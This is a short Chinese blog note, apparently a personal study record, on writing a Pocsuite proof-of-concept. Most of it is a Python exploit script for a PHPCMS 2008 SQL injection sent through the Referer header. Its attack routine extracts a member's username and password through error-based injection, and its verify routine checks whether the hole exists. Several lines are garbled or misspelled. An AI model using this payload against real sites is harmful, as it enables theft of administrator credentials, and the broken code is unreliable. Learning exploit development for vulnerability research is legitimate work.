在这里,首先向安全圈最大的娱乐公司,某404致敬。
参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁
长话短说其实,可*发挥的部分并不多,以原博文中的SQL注入的例子(web应用漏洞)来记录自己的学习心得笔记。
感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,*发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。
镣铐起舞更美是不,哎,其他的照抄吧,*发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala
#!/usr/bin/env python
# -*- coding:utf-8 -*- #import system lib files
import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看
import re
import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
import urlparse #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类
from pocsuite.net import reg
from pocsuite.poc import POCBase
from pocsuite.utils import register class mytest_poc(POCBase):
vulID = '' #漏洞编号-ssvid
version = 1 #poc version
author = ["no.1 author","no.2 author",...] #author name list
vulDate = '2011-11-21' #vul discory(report) date
createDate = '2015-09-23' #poc create date
updateDate = '2015-09-23' #poc update date
referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #参考文献
name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name
appPowerLink = 'http://www.phpcms.cn' #app vendor link
appName = 'PHPCMS'
appVersion = ''
vulType = 'SQL Injection' # 漏洞类型
desc = """balabala""" #描述
samples = ['http://10.1.200.28/'] def _attack(self):
result = {}
vulurl = urlparse.urljson(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = reg.get(vulurl,headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result) def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload return self.parse_attack(result) def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output register(mytest_poc)